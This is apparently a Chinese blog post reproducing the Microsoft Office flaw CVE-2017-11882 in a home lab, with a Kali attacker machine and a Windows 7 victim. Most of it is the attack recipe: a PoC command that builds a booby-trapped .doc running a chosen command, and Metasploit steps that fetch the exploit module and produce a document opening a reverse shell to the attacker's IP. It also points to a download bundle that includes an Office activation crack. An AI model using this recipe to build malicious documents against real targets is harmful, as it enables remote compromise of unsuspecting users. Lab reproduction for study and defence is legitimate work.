1.今天看到有复现的文章,看了好几篇决定本地测试该漏洞
利用工具清单:
a) tcp反弹:kali 172.16.1.204
b) 安装office2013的系统:win7 172.16.253.4
1. Msf 用到的 Poc
2. office2013、激活工具
3. win7旗舰版ISO镜像
以上工具已经打包好,下载地址:
链接:http://pan.baidu.com/s/1o8635Om 密码:xl91
Microsoft Office再次爆出内存破坏漏洞,CVEID CVE-2017-11882,攻击者可以利用此问题,在当前登录用户的上下文中执行任意代码。失败的开发尝试可能会导致拒绝服务条件。
漏洞触发的原理http://www.freebuf.com/articles/web/155304.html
受影响版本包括,Office 2016、Office 2013、Office 2010、Office 2007的相关版本。
POC地址:https://github.com/Ridter/CVE-2017-11882/
分割符--------------------------------------------------------------------
上面都是废话,进入正题
1、简单的生成弹计算器的doc文件
命令:python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
生成的doc文件直接打开就可以弹出计算器了
2、生成可以反弹shell的doc文件
这首先下载metasploit的攻击模块
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
之后移动到下面这个目录
mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat
接着启动metasploit
输入
use exploit/windows/fileformat/office_ms17_11882
设置生成的文件名字
set filename bboysoul.doc
设置主机ip
set lhost 172.16.1.204
开始攻击
exploit
回连成功,shell
exit